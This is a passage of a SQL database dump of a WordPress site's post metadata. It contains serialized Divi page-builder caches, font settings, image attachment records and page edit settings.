"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(3164,321,'_et_builder_module_features_cache','a:2:{i:0;s:108:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"tb\":{\"528\":\"2023-04-10 13:15:21\",\"523\":\"2023-04-08 21:29:25\"},\"wpe\":[]}\";i:1;a:16:{s:46:\"et_pb_section_32a8701e7e646d30f5be44fd1d6edd9d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_c3a1c68d2adfcb81a9fe911b91eb1bb1\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_c3c3262b1d77b10d3324caf58042baf2\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_menu_3956b2fa036f918b04bf26e28a131ba0\";a:9:{s:4:\"glde\";a:4:{s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_172db018d4013a78711547224058b6c2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_31fed4101e23ca62587312176ae0485e\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_752d704473cb7649afba5776e481f4d6\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:50:\"dsm_typing_effect_f83fbae2b90aa9ca67e8f7cdaad5f02e\";a:8:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_1c9d155ec9a950d8f0cf7d9fe5cf84e2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_9f6c6d70948c656773a17b5acb09701d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_dc94591ca1f11490920cfd7ce8dba4f5\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_77d127db2576298639a5583910366fe3\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_871c12bedc48851ed22de1edc6b0a8be\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9740826f7ba656f5ce332a179206bb40\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_0c6c5085bab557fb2d753c3737ff57a8\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9b58c67d7966a2e09473c3a3f2480328\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}}}'),(2623,745,'_wp_trash_meta_time','1680567014'),(2624,745,'_wp_desired_post_slug',''),(3073,900,'_wp_attached_file','2023/04/Page-Header-2200x500-1.jpg'),(2081,550,'_wp_attached_file','2023/03/j-sutton-logo-white-no-background.png'),(2082,550,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:761;s:6:\"height\";i:556;s:4:\"file\";s:45:\"2023/03/j-sutton-logo-white-no-background.png\";s:8:\"filesize\";i:112055;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"j-sutton-logo-white-no-background-300x219.png\";s:5:\"width\";i:300;s:6:\"height\";i:219;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:30973;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"j-sutton-logo-white-no-background-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14936;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:45:\"j-sutton-logo-white-no-background-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45307;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:45:\"j-sutton-logo-white-no-background-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46301;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:45:\"j-sutton-logo-white-no-background-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:67201;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:45:\"j-sutton-logo-white-no-background-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:72844;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:45:\"j-sutton-logo-white-no-background-480x351.png\";s:5:\"width\";i:480;s:6:\"height\";i:351;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:59961;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"11\";s:8:\"quantity\";d:88;s:4:\"webp\";i:0;}}'),(2153,577,'_et_pb_built_for_post_type','page'),(2154,578,'_et_pb_built_for_post_type','page'),(2157,581,'_et_pb_built_for_post_type','page'),(2705,707,'_wp_old_date','2023-04-03'),(3162,321,'_et_dynamic_cached_attributes','a:0:{}'),(3163,321,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(2239,615,'_et_pb_use_builder','on'),(2240,615,'_edit_last','3'),(2241,615,'_edit_lock','1681132566:3'),(2162,585,'_et_pb_built_for_post_type','page'),(2163,587,'_et_pb_module_type','dsm_button'),(2164,587,'_et_pb_built_for_post_type','page'),(3075,384,'_wp_old_date','2023-04-08'),(3076,711,'_wp_old_date','2023-04-08'),(3077,709,'_wp_old_date','2023-04-08'),(3078,708,'_wp_old_date','2023-04-08'),(3079,707,'_wp_old_date','2023-04-08'),(2892,819,'_et_pb_ab_subjects',''),(2891,819,'_et_pb_built_for_post_type','page'),(2889,819,'_et_pb_show_page_creation','off'),(3173,311,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(2701,384,'_wp_old_date','2023-04-03'),(2702,709,'_wp_old_date','2023-04-03'),(2703,708,'_wp_old_date','2023-04-03'),(2252,615,'_et_pb_ab_subjects',''),(2253,615,'_et_pb_enable_shortcode_tracking',''),(2254,615,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"615\" /]'),(2243,615,'_et_pb_built_for_post_type','page'),(2704,711,'_wp_old_date','2023-04-03'),(2264,615,'_wp_page_template','default'),(2258,615,'_global_colors_info','{}'),(2259,615,'_et_pb_first_image',''),(2260,615,'_et_pb_truncate_post',''),(2261,615,'_et_pb_truncate_post_date',''),(2262,615,'_et_builder_version','VB|Divi|4.20.4'),(2263,615,'_et_pb_show_page_creation','off'),(2265,615,'_et_pb_post_hide_nav','default'),(2266,615,'_et_pb_page_layout','et_right_sidebar'),(2267,615,'_et_pb_side_nav','off'),(2268,615,'_et_pb_old_content',''),(2671,759,'_et_pb_built_for_post_type','page'),(3155,315,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(3156,315,'_et_dynamic_cached_attributes','a:0:{}'),(3157,315,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(2271,615,'_et_builder_dynamic_assets_loading_attr_threshold','4'),(2926,834,'_et_pb_built_for_post_type','page'),(2927,835,'_et_pb_built_for_post_type','page'),(3191,702,'_et_dynamic_cached_shortcodes','a:6:{i:0;s:13:\"et_pb_section\";i:1;s:9:\"et_pb_row\";i:2;s:12:\"et_pb_column\";i:30;s:11:\"et_pb_image\";i:33;s:10:\"et_pb_menu\";i:49;s:10:\"et_pb_text\";}'),(3192,702,'_et_dynamic_cached_attributes','a:0:{}'),(3193,702,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:1:{s:15:\"et-gf-open-sans\";s:94:\"Open+Sans:300,regular,500,600,700,800,300italic,italic,500italic,600italic,700italic,800italic\";}s:6:\"subset\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:9:\"cache_key\";s:69:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"enable_all_character_sets\":\"on\"}\";}'),(3194,702,'_et_builder_module_features_cache','a:2:{i:0;s:108:\"{\"gph\":0,\"divi\":\"4.20.4\",\"wp\":\"6.2\",\"tb\":{\"528\":\"2023-04-10 13:15:21\",\"523\":\"2023-04-08 21:29:25\"},\"wpe\":[]}\";i:1;a:32:{s:46:\"et_pb_section_32a8701e7e646d30f5be44fd1d6edd9d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_c3a1c68d2adfcb81a9fe911b91eb1bb1\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_c3c3262b1d77b10d3324caf58042baf2\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_menu_3956b2fa036f918b04bf26e28a131ba0\";a:9:{s:4:\"glde\";a:4:{s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_0d6282d7405bf99b667dc5f633c3bf57\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_e506abe2c72c9efaf068d1a321b0116c\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_0631c140be216de36055bda4ddb4903b\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_e35e0a593739fb93017a5f566a0a99ac\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_97dd058e8d81f50e9a0db8557394a164\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_e506abe2c72c9efaf068d1a321b0116c\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:49:\"dsm_text_divider_e66ddedbf97c1552cf8065890ead4be0\";a:6:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_ff0c833e24c3bc53115d52432edb7d56\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_5eff6cba2d4bb76e0c74a487bf2128b3\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_db01c3a2feea4c8f258f61a6efe7f614\";a:4:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_0e74363fb47569a15631ef625ac86e4b\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_966311c3e0e83d6de2f4fc199de2e24b\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_55aa963308fecbd5dbf74c6b6e933391\";a:4:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_366204ef728e823eb716bfac82f2d67a\";a:4:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_7bd898be6b28fcb61d92f044440e2bc0\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_abeaf3554eabc810d338157b74cf23a8\";a:4:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_172db018d4013a78711547224058b6c2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_31fed4101e23ca62587312176ae0485e\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_752d704473cb7649afba5776e481f4d6\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:50:\"dsm_typing_effect_f83fbae2b90aa9ca67e8f7cdaad5f02e\";a:8:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_1c9d155ec9a950d8f0cf7d9fe5cf84e2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_9f6c6d70948c656773a17b5acb09701d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_dc94591ca1f11490920cfd7ce8dba4f5\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_77d127db2576298639a5583910366fe3\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_871c12bedc48851ed22de1edc6b0a8be\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9740826f7ba656f5ce332a179206bb40\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_0c6c5085bab557fb2d753c3737ff57a8\";a:3:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_9b58c67d7966a2e09473c3a3f2480328\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}}}'),(2376,653,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1000;s:4:\"file\";s:39:\"2023/04/Justin-Conference-2-Cropped.png\";s:8:\"filesize\";i:1256944;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"Justin-Conference-2-Cropped-300x117.png\";s:5:\"width\";i:300;s:6:\"height\";i:117;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24075;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"Justin-Conference-2-Cropped-1024x400.png\";s:5:\"width\";i:1024;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:227837;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Justin-Conference-2-Cropped-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14115;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"Justin-Conference-2-Cropped-768x300.png\";s:5:\"width\";i:768;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:133230;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:40:\"Justin-Conference-2-Cropped-1536x600.png\";s:5:\"width\";i:1536;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:492796;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:40:\"Justin-Conference-2-Cropped-2048x800.png\";s:5:\"width\";i:2048;s:6:\"height\";i:800;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:847255;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:39:\"Justin-Conference-2-Cropped-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:55806;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:40:\"Justin-Conference-2-Cropped-1080x675.png\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:351049;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:39:\"Justin-Conference-2-Cropped-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:61639;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:39:\"Justin-Conference-2-Cropped-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99906;}s:28:\"et-pb-portfolio-image-single\";a:5:{s:4:\"file\";s:40:\"Justin-Conference-2-Cropped-1080x422.png\";s:5:\"width\";i:1080;s:6:\"height\";i:422;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:251995;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:39:\"Justin-Conference-2-Cropped-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:95131;}s:32:\"et-pb-image--responsive--desktop\";a:5:{s:4:\"file\";s:40:\"Justin-Conference-2-Cropped-1280x500.png\";s:5:\"width\";i:1280;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:342296;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:39:\"Justin-Conference-2-Cropped-980x383.png\";s:5:\"width\";i:980;s:6:\"height\";i:383;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:209460;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:39:\"Justin-Conference-2-Cropped-480x188.png\";s:5:\"width\";i:480;s:6:\"height\";i:188;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56360;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"35\";s:8:\"quantity\";d:44;s:4:\"webp\";i:0;}}'),(2375,653,'_wp_attached_file','2023/04/Justin-Conference-2-Cropped.png'),(2288,384,'_wp_old_date','2023-03-31'),(2614,741,'_et_pb_row_layout','4_4'),(2615,741,'_et_pb_built_for_post_type','page'),(2469,694,'_et_pb_ab_subjects',''),(2470,694,'_et_pb_enable_shortcode_tracking',''),(2471,694,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"694\" /]'),(2460,694,'_et_pb_built_for_post_type','page'),(2543,702,'_et_pb_built_for_post_type','page'),(2477,694,'_et_pb_truncate_post',''),(2478,694,'_et_pb_truncate_post_date',''),(2479,694,'_et_builder_version','VB|Divi|4.20.2'),(2480,694,'_et_pb_show_page_creation','off'),(2482,694,'_et_pb_post_hide_nav','default'),(2483,694,'_et_pb_page_layout','et_right_sidebar'),(2484,694,'_et_pb_side_nav','off'),(2485,694,'_et_pb_old_content',''),(2488,694,'_et_builder_dynamic_assets_loading_attr_threshold','5'),(2498,702,'_edit_lock','1681249131:3'),(2503,702,'_edit_last','1'),(2504,702,'_wp_page_template','default'),(2505,702,'_et_pb_post_hide_nav','default'),(2506,702,'_et_pb_page_layout','et_right_sidebar'),(2507,702,'_et_pb_side_nav','off'),(2508,702,'_et_pb_use_builder','on'),(2509,702,'_et_pb_first_image',''),(2510,702,'_et_pb_truncate_post',''),(2511,702,'_et_pb_truncate_p